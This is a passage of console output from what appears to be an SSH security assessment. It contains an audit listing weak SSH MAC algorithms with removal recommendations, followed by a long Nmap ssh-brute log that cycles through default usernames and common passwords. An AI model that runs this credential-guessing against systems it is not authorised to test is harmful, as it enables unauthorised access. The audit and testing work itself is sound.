698. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
699. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
700. `- [warn] using encrypt-and-MAC mode
701. `- [warn] using weak hashing algorithm
702. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
703. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
704. `- [warn] using weak hashing algorithm
705. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
706. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
707. `- [warn] using small 64-bit tag size
708. `- [info] available since OpenSSH 4.7
709. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
710. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
711. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
712. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
713. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
714. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
715. `- [warn] using encrypt-and-MAC mode
716. `- [info] available since OpenSSH 2.5.0
717. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
718. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
719. `- [warn] using encrypt-and-MAC mode
720. `- [info] available since OpenSSH 2.1.0
721. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
722. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
723. `- [warn] using encrypt-and-MAC mode
724. `- [warn] using weak hashing algorithm
725. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
726. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
727. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
728. `- [warn] using encrypt-and-MAC mode
729. `- [warn] using weak hashing algorithm
730. `- [info] available since OpenSSH 2.5.0
731.  
732. # algorithm recommendations (for OpenSSH 5.3)
733. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
734. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
735. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
736. (rec) -ssh-dss -- key algorithm to remove
737. (rec) -arcfour -- enc algorithm to remove
738. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
739. (rec) -blowfish-cbc -- enc algorithm to remove
740. (rec) -3des-cbc -- enc algorithm to remove
741. (rec) -aes256-cbc -- enc algorithm to remove
742. (rec) -arcfour256 -- enc algorithm to remove
743. (rec) -cast128-cbc -- enc algorithm to remove
744. (rec) -aes192-cbc -- enc algorithm to remove
745. (rec) -arcfour128 -- enc algorithm to remove
746. (rec) -aes128-cbc -- enc algorithm to remove
747. (rec) -hmac-md5-96 -- mac algorithm to remove
748. (rec) -hmac-ripemd160 -- mac algorithm to remove
749. (rec) -hmac-sha1-96 -- mac algorithm to remove
750. (rec) -umac-64@openssh.com -- mac algorithm to remove
751. (rec) -hmac-md5 -- mac algorithm to remove
752. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
753. (rec) -hmac-sha1 -- mac algorithm to remove
754.  
755.  
756. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:36 EDT
757. NSE: [ssh-run] Failed to specify credentials and command to run.
758. NSE: [ssh-brute] Trying username/password pair: root:root
759. NSE: [ssh-brute] Trying username/password pair: admin:admin
760. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
761. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
762. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
763. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
764. NSE: [ssh-brute] Trying username/password pair: guest:guest
765. NSE: [ssh-brute] Trying username/password pair: user:user
766. NSE: [ssh-brute] Trying username/password pair: web:web
767. NSE: [ssh-brute] Trying username/password pair: test:test
768. NSE: [ssh-brute] Trying username/password pair: root:
769. NSE: [ssh-brute] Trying username/password pair: admin:
770. NSE: [ssh-brute] Trying username/password pair: administrator:
771. NSE: [ssh-brute] Trying username/password pair: webadmin:
772. NSE: [ssh-brute] Trying username/password pair: sysadmin:
773. NSE: [ssh-brute] Trying username/password pair: netadmin:
774. NSE: [ssh-brute] Trying username/password pair: guest:
775. NSE: [ssh-brute] Trying username/password pair: user:
776. NSE: [ssh-brute] Trying username/password pair: web:
777. NSE: [ssh-brute] Trying username/password pair: test:
778. NSE: [ssh-brute] Trying username/password pair: root:123456
779. NSE: [ssh-brute] Trying username/password pair: admin:123456
780. NSE: [ssh-brute] Trying username/password pair: administrator:123456
781. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
782. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
783. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
784. NSE: [ssh-brute] Trying username/password pair: guest:123456
785. NSE: [ssh-brute] Trying username/password pair: user:123456
786. NSE: [ssh-brute] Trying username/password pair: web:123456
787. NSE: [ssh-brute] Trying username/password pair: test:123456
788. NSE: [ssh-brute] Trying username/password pair: root:12345
789. NSE: [ssh-brute] Trying username/password pair: admin:12345
790. NSE: [ssh-brute] Trying username/password pair: administrator:12345
791. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
792. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
793. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
794. NSE: [ssh-brute] Trying username/password pair: guest:12345
795. NSE: [ssh-brute] Trying username/password pair: user:12345
796. NSE: [ssh-brute] Trying username/password pair: web:12345
797. NSE: [ssh-brute] Trying username/password pair: test:12345
798. NSE: [ssh-brute] Trying username/password pair: root:123456789
799. NSE: [ssh-brute] Trying username/password pair: admin:123456789
800. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
801. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
802. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
803. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
804. NSE: [ssh-brute] Trying username/password pair: guest:123456789
805. NSE: [ssh-brute] Trying username/password pair: user:123456789
806. NSE: [ssh-brute] Trying username/password pair: web:123456789
807. NSE: [ssh-brute] Trying username/password pair: test:123456789
808. NSE: [ssh-brute] Trying username/password pair: root:password
809. NSE: [ssh-brute] Trying username/password pair: admin:password
810. NSE: [ssh-brute] Trying username/password pair: administrator:password
811. NSE: [ssh-brute] Trying username/password pair: webadmin:password
812. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
813. NSE: [ssh-brute] Trying username/password pair: netadmin:password
814. NSE: [ssh-brute] Trying username/password pair: guest:password
815. NSE: [ssh-brute] Trying username/password pair: user:password
816. NSE: [ssh-brute] Trying username/password pair: web:password
817. NSE: [ssh-brute] Trying username/password pair: test:password
818. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
819. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
820. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
821. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
822. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
823. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
824. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
825. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
826. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
827. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
828. NSE: [ssh-brute] Trying username/password pair: root:princess
829. NSE: [ssh-brute] Trying username/password pair: admin:princess
830. NSE: [ssh-brute] Trying username/password pair: administrator:princess
831. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
832. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
833. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
834. NSE: [ssh-brute] Trying username/password pair: guest:princess
835. NSE: [ssh-brute] Trying username/password pair: user:princess
836. NSE: [ssh-brute] Trying username/password pair: web:princess
837. NSE: [ssh-brute] Trying username/password pair: test:princess
838. NSE: [ssh-brute] Trying username/password pair: root:12345678
839. NSE: [ssh-brute] Trying username/password pair: admin:12345678
840. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
841. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
842. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
843. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
844. NSE: [ssh-brute] Trying username/password pair: guest:12345678
845. NSE: [ssh-brute] Trying username/password pair: user:12345678
846. NSE: [ssh-brute] Trying username/password pair: web:12345678
847. NSE: [ssh-brute] Trying username/password pair: test:12345678
848. NSE: [ssh-brute] Trying username/password pair: root:1234567
849. NSE: [ssh-brute] Trying username/password pair: admin:1234567
850. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
851. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
852. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
853. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
854. NSE: [ssh-brute] Trying username/password pair: guest:1234567
855. NSE: [ssh-brute] Trying username/password pair: user:1234567
856. NSE: [ssh-brute] Trying username/password pair: web:1234567
857. NSE: [ssh-brute] Trying username/password pair: test:1234567
858. NSE: [ssh-brute] Trying username/password pair: root:abc123
859. NSE: [ssh-brute] Trying username/password pair: admin:abc123
860. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
861. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
862. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
863. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
864. NSE: [ssh-brute] Trying username/password pair: guest:abc123
865. NSE: [ssh-brute] Trying username/password pair: user:abc123
866. NSE: [ssh-brute] Trying username/password pair: web:abc123
867. NSE: [ssh-brute] Trying username/password pair: test:abc123
868. NSE: [ssh-brute] Trying username/password pair: root:nicole
869. NSE: [ssh-brute] Trying username/password pair: admin:nicole
870. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
871. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
872. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
873. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
874. NSE: [ssh-brute] Trying username/password pair: guest:nicole
875. NSE: [ssh-brute] Trying username/password pair: user:nicole
876. NSE: [ssh-brute] Trying username/password pair: web:nicole
877. NSE: [ssh-brute] Trying username/password pair: test:nicole
878. NSE: [ssh-brute] Trying username/password pair: root:daniel
879. NSE: [ssh-brute] Trying username/password pair: admin:daniel
880. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
881. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
882. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
883. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
884. NSE: [ssh-brute] Trying username/password pair: guest:daniel
885. NSE: [ssh-brute] Trying username/password pair: user:daniel
886. NSE: [ssh-brute] Trying username/password pair: web:daniel
887. NSE: [ssh-brute] Trying username/password pair: test:daniel
888. NSE: [ssh-brute] Trying username/password pair: root:monkey
889. NSE: [ssh-brute] Trying username/password pair: admin:monkey
890. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
891. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
892. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
893. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
894. NSE: [ssh-brute] Trying username/password pair: guest:monkey
895. NSE: [ssh-brute] Trying username/password pair: user:monkey
896. NSE: [ssh-brute] Trying username/password pair: web:monkey
897. NSE: [ssh-brute] Trying username/password pair: test:monkey
898. NSE: [ssh-brute] Trying username/password pair: root:babygirl
899. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
900. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
901. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
902. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
903. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
904. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
905. NSE: [ssh-brute] Trying username/password pair: user:babygirl
906. NSE: [ssh-brute] Trying username/password pair: web:babygirl
907. NSE: [ssh-brute] Trying username/password pair: test:babygirl
908. NSE: [ssh-brute] Trying username/password pair: root:qwerty
909. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
910. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
911. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
912. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
913. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
914. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
915. NSE: [ssh-brute] Trying username/password pair: user:qwerty
916. NSE: [ssh-brute] Trying username/password pair: web:qwerty
917. NSE: [ssh-brute] Trying username/password pair: test:qwerty
918. NSE: [ssh-brute] Trying username/password pair: root:lovely
919. NSE: [ssh-brute] Trying username/password pair: admin:lovely
920. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
921. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
922. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
923. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
924. NSE: [ssh-brute] Trying username/password pair: guest:lovely
925. NSE: [ssh-brute] Trying username/password pair: user:lovely
926. NSE: [ssh-brute] Trying username/password pair: web:lovely
927. NSE: [ssh-brute] Trying username/password pair: test:lovely
928. NSE: [ssh-brute] Trying username/password pair: root:654321
929. NSE: [ssh-brute] Trying username/password pair: admin:654321
930. NSE: [ssh-brute] Trying username/password pair: administrator:654321
931. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
932. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
933. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
934. NSE: [ssh-brute] Trying username/password pair: guest:654321
935. NSE: [ssh-brute] Trying username/password pair: user:654321
936. NSE: [ssh-brute] Trying username/password pair: web:654321
937. NSE: [ssh-brute] Trying username/password pair: test:654321
938. NSE: [ssh-brute] Trying username/password pair: root:michael
939. NSE: [ssh-brute] Trying username/password pair: admin:michael
940. NSE: [ssh-brute] Trying username/password pair: administrator:michael
941. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
942. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
943. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
944. NSE: [ssh-brute] Trying username/password pair: guest:michael
945. NSE: [ssh-brute] Trying username/password pair: user:michael
946. NSE: [ssh-brute] Trying username/password pair: web:michael
947. NSE: [ssh-brute] Trying username/password pair: test:michael
948. NSE: [ssh-brute] Trying username/password pair: root:jessica
949. NSE: [ssh-brute] Trying username/password pair: admin:jessica
950. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
951. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
952. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
953. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
954. NSE: [ssh-brute] Trying username/password pair: guest:jessica
955. NSE: [ssh-brute] Trying username/password pair: user:jessica
956. NSE: [ssh-brute] Trying username/password pair: web:jessica
957. NSE: [ssh-brute] Trying username/password pair: test:jessica
958. NSE: [ssh-brute] Trying username/password pair: root:111111
959. NSE: [ssh-brute] Trying username/password pair: admin:111111
960. NSE: [ssh-brute] Trying username/password pair: administrator:111111
961. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
962. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
963. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
964. NSE: [ssh-brute] Trying username/password pair: guest:111111
965. NSE: [ssh-brute] Trying username/password pair: user:111111
966. NSE: [ssh-brute] Trying username/password pair: web:111111
967. NSE: [ssh-brute] Trying username/password pair: test:111111
968. NSE: [ssh-brute] Trying username/password pair: root:ashley
969. NSE: [ssh-brute] Trying username/password pair: admin:ashley
970. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
971. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
972. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
973. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
974. NSE: [ssh-brute] Trying username/password pair: guest:ashley
975. NSE: [ssh-brute] Trying username/password pair: user:ashley
976. NSE: [ssh-brute] Trying username/password pair: web:ashley
977. NSE: [ssh-brute] Trying username/password pair: test:ashley
978. NSE: [ssh-brute] Trying username/password pair: root:000000
979. NSE: [ssh-brute] Trying username/password pair: admin:000000
980. NSE: [ssh-brute] Trying username/password pair: administrator:000000
981. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
982. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
983. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
984. NSE: [ssh-brute] Trying username/password pair: guest:000000
985. NSE: [ssh-brute] Trying username/password pair: user:000000
986. NSE: [ssh-brute] Trying username/password pair: web:000000
987. NSE: [ssh-brute] Trying username/password pair: test:000000
988. NSE: [ssh-brute] Trying username/password pair: root:iloveu
989. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
990. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
991. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
992. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
993. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
994. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
995. NSE: [ssh-brute] Trying username/password pair: user:iloveu
996. NSE: [ssh-brute] Trying username/password pair: web:iloveu
997. NSE: [ssh-brute] Trying username/password pair: test:iloveu
998. NSE: [ssh-brute] Trying username/password pair: root:michelle
999. NSE: [ssh-brute] Trying username/password pair: admin:michelle
1000. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
1001. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
1002. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
1003. NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
1004. NSE: [ssh-brute] Trying username/password pair: guest:michelle
1005. NSE: [ssh-brute] Trying username/password pair: user:michelle
1006. NSE: [ssh-brute] Trying username/password pair: web:michelle
1007. NSE: [ssh-brute] Trying username/password pair: test:michelle
1008. NSE: [ssh-brute] Trying username/password pair: root:tigger
1009. NSE: [ssh-brute] Trying username/password pair: admin:tigger
1010. NSE: [ssh-brute] Trying username/password pair: administrator:tigger
1011. NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
1012. NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
1013. NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
1014. NSE: [ssh-brute] Trying username/password pair: guest:tigger
1015. NSE: [ssh-brute] Trying username/password pair: user:tigger
1016. NSE: [ssh-brute] Trying username/password pair: web:tigger
1017. NSE: [ssh-brute] Trying username/password pair: test:tigger
1018. NSE: [ssh-brute] Trying username/password pair: root:sunshine
1019. NSE: [ssh-brute] Trying username/password pair: admin:sunshine
1020. NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
1021. NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
1022. NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
1023. NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
1024. NSE: [ssh-brute] Trying username/password pair: guest:sunshine
1025. NSE: [ssh-brute] Trying username/password pair: user:sunshine
1026. NSE: [ssh-brute] Trying username/password pair: web:sunshine
1027. NSE: [ssh-brute] Trying username/password pair: test:sunshine
1028. NSE: [ssh-brute] Trying username/password pair: root:chocolate
1029. NSE: [ssh-brute] Trying username/password pair: admin:chocolate
1030. NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
1031. NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
1032. NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
1033. NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
1034. NSE: [ssh-brute] Trying username/password pair: guest:chocolate
1035. NSE: [ssh-brute] Trying username/password pair: user:chocolate
1036. NSE: [ssh-brute] Trying username/password pair: web:chocolate
1037. NSE: [ssh-brute] Trying username/password pair: test:chocolate
1038. NSE: [ssh-brute] Trying username/password pair: root:password1
1039. NSE: [ssh-brute] Trying username/password pair: admin:password1
1040. NSE: [ssh-brute] Trying username/password pair: administrator:password1
1041. NSE: [ssh-brute] Trying username/password pair: webadmin:password1
1042. NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
1043. NSE: [ssh-brute] Trying username/password pair: netadmin:password1
1044. NSE: [ssh-brute] Trying username/password pair: guest:password1
1045. NSE: [ssh-brute] Trying username/password pair: user:password1
1046. NSE: [ssh-brute] Trying username/password pair: web:password1
1047. NSE: [ssh-brute] Trying username/password pair: test:password1
1048. NSE: [ssh-brute] Trying username/password pair: root:soccer
1049. NSE: [ssh-brute] Trying username/password pair: admin:soccer
1050. NSE: [ssh-brute] Trying username/password pair: administrator:soccer
1051. NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
1052. NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
1053. NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
1054. NSE: [ssh-brute] Trying username/password pair: guest:soccer
1055. NSE: [ssh-brute] Trying username/password pair: user:soccer
1056. NSE: [ssh-brute] Trying username/password pair: web:soccer
1057. NSE: [ssh-brute] Trying username/password pair: test:soccer
1058. NSE: [ssh-brute] Trying username/password pair: root:anthony
1059. NSE: [ssh-brute] Trying username/password pair: admin:anthony
1060. NSE: [ssh-brute] Trying username/password pair: administrator:anthony
1061. NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
1062. NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
1063. NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
1064. NSE: [ssh-brute] Trying username/password pair: guest:anthony
1065. NSE: [ssh-brute] Trying username/password pair: user:anthony
1066. NSE: [ssh-brute] Trying username/password pair: web:anthony
1067. NSE: [ssh-brute] Trying username/password pair: test:anthony
1068. NSE: [ssh-brute] Trying username/password pair: root:friends
1069. NSE: [ssh-brute] Trying username/password pair: admin:friends
1070. NSE: [ssh-brute] Trying username/password pair: administrator:friends
1071. NSE: [ssh-brute] Trying username/password pair: webadmin:friends
1072. NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
1073. NSE: [ssh-brute] Trying username/password pair: netadmin:friends
1074. NSE: [ssh-brute] Trying username/password pair: guest:friends
1075. NSE: [ssh-brute] Trying username/password pair: user:friends
1076. NSE: [ssh-brute] Trying username/password pair: web:friends
1077. NSE: [ssh-brute] Trying username/password pair: test:friends
1078. NSE: [ssh-brute] Trying username/password pair: root:purple
1079. NSE: [ssh-brute] Trying username/password pair: admin:purple
1080. NSE: [ssh-brute] Trying username/password pair: administrator:purple
1081. NSE: [ssh-brute] Trying username/password pair: webadmin:purple
1082. NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
1083. NSE: [ssh-brute] Trying username/password pair: netadmin:purple
1084. NSE: [ssh-brute] Trying username/password pair: guest:purple
1085. NSE: [ssh-brute] Trying username/password pair: user:purple
1086. NSE: [ssh-brute] Trying username/password pair: web:purple
1087. NSE: [ssh-brute] Trying username/password pair: test:purple
1088. NSE: [ssh-brute] Trying username/password pair: root:angel
1089. NSE: [ssh-brute] Trying username/password pair: admin:angel
1090. NSE: [ssh-brute] Trying username/password pair: administrator:angel
1091. NSE: [ssh-brute] Trying username/password pair: webadmin:angel
1092. NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
1093. NSE: [ssh-brute] Trying username/password pair: netadmin:angel
1094. NSE: [ssh-brute] Trying username/password pair: guest:angel
1095. NSE: [ssh-brute] Trying username/password pair: user:angel
1096. NSE: [ssh-brute] Trying username/password pair: web:angel
1097. NSE: [ssh-brute] Trying username/password pair: test:angel
1098. NSE: [ssh-brute] Trying username/password pair: root:butterfly
1099. NSE: [ssh-brute] Trying username/password pair: admin:butterfly
1100. NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
1101. NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
1102. NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
1103. NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
1104. NSE: [ssh-brute] Trying username/password pair: guest:butterfly
1105. NSE: [ssh-brute] Trying username/password pair: user:butterfly
1106. NSE: [ssh-brute] Trying username/password pair: web:butterfly
1107. NSE: [ssh-brute] Trying username/password pair: test:butterfly
1108. NSE: [ssh-brute] Trying username/password pair: root:jordan
1109. NSE: [ssh-brute] Trying username/password pair: admin:jordan
1110. NSE: [ssh-brute] Trying username/password pair: administrator:jordan
1111. NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
1112. NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
1113. NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
1114. NSE: [ssh-brute] Trying username/password pair: guest:jordan
1115. NSE: [ssh-brute] Trying username/password pair: user:jordan
1116. NSE: [ssh-brute] Trying username/password pair: web:jordan
1117. NSE: [ssh-brute] Trying username/password pair: test:jordan
1118. NSE: [ssh-brute] Trying username/password pair: root:fuckyou
1119. NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
1120. NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
1121. NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
1122. NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
1123. NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
1124. NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
1125. NSE: [ssh-brute] Trying username/password pair: user:fuckyou
1126. NSE: [ssh-brute] Trying username/password pair: web:fuckyou
1127. NSE: [ssh-brute] Trying username/password pair: test:fuckyou
1128. NSE: [ssh-brute] Trying username/password pair: root:123123
1129. NSE: [ssh-brute] Trying username/password pair: admin:123123
1130. NSE: [ssh-brute] Trying username/password pair: administrator:123123
1131. NSE: [ssh-brute] Trying username/password pair: webadmin:123123
1132. NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
1133. NSE: [ssh-brute] Trying username/password pair: netadmin:123123
1134. NSE: [ssh-brute] Trying username/password pair: guest:123123
1135. NSE: [ssh-brute] Trying username/password pair: user:123123
1136. NSE: [ssh-brute] Trying username/password pair: web:123123
1137. NSE: [ssh-brute] Trying username/password pair: test:123123
1138. NSE: [ssh-brute] Trying username/password pair: root:justin
1139. NSE: [ssh-brute] Trying username/password pair: admin:justin
1140. NSE: [ssh-brute] Trying username/password pair: administrator:justin
1141. NSE: [ssh-brute] Trying username/password pair: webadmin:justin
1142. NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
1143. NSE: [ssh-brute] Trying username/password pair: netadmin:justin
1144. NSE: [ssh-brute] Trying username/password pair: guest:justin
1145. NSE: [ssh-brute] Trying username/password pair: user:justin
1146. NSE: [ssh-brute] Trying username/password pair: web:justin
1147. NSE: [ssh-brute] Trying username/password pair: test:justin
1148. NSE: [ssh-brute] Trying username/password pair: root:liverpool
1149. NSE: [ssh-brute] Trying username/password pair: admin:liverpool
1150. NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
1151. NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
1152. NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
1153. NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
1154. NSE: [ssh-brute] Trying username/password pair: guest:liverpool
1155. NSE: [ssh-brute] Trying username/password pair: user:liverpool
1156. NSE: [ssh-brute] Trying username/password pair: web:liverpool
1157. NSE: [ssh-brute] Trying username/password pair: test:liverpool
1158. NSE: [ssh-brute] Trying username/password pair: root:football
1159. NSE: [ssh-brute] Trying username/password pair: admin:football
1160. NSE: [ssh-brute] Trying username/password pair: administrator:football
1161. NSE: [ssh-brute] Trying username/password pair: webadmin:football
1162. NSE: [ssh-brute] Trying username/password pair: sysadmin:football
1163. NSE: [ssh-brute] Trying username/password pair: netadmin:football
1164. NSE: [ssh-brute] Trying username/password pair: guest:football
1165. NSE: [ssh-brute] Trying username/password pair: user:football
1166. NSE: [ssh-brute] Trying username/password pair: web:football
1167. NSE: [ssh-brute] Trying username/password pair: test:football
1168. NSE: [ssh-brute] Trying username/password pair: root:loveme
1169. NSE: [ssh-brute] Trying username/password pair: admin:loveme
1170. NSE: [ssh-brute] Trying username/password pair: administrator:loveme
1171. NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
1172. NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
1173. NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
1174. NSE: [ssh-brute] Trying username/password pair: guest:loveme
1175. NSE: [ssh-brute] Trying username/password pair: user:loveme
1176. NSE: [ssh-brute] Trying username/password pair: web:loveme
1177. NSE: [ssh-brute] Trying username/password pair: test:loveme
1178. NSE: [ssh-brute] Trying username/password pair: root:secret
1179. NSE: [ssh-brute] Trying username/password pair: admin:secret
1180. NSE: [ssh-brute] Trying username/password pair: administrator:secret
1181. NSE: [ssh-brute] Trying username/password pair: webadmin:secret
1182. NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
1183. NSE: [ssh-brute] Trying username/password pair: netadmin:secret
1184. NSE: [ssh-brute] Trying username/password pair: guest:secret
1185. NSE: [ssh-brute] Trying username/password pair: user:secret
1186. NSE: [ssh-brute] Trying username/password pair: web:secret
1187. NSE: [ssh-brute] Trying username/password pair: test:secret
1188. NSE: [ssh-brute] Trying username/password pair: root:andrea
1189. NSE: [ssh-brute] Trying username/password pair: admin:andrea
1190. NSE: [ssh-brute] Trying username/password pair: administrator:andrea
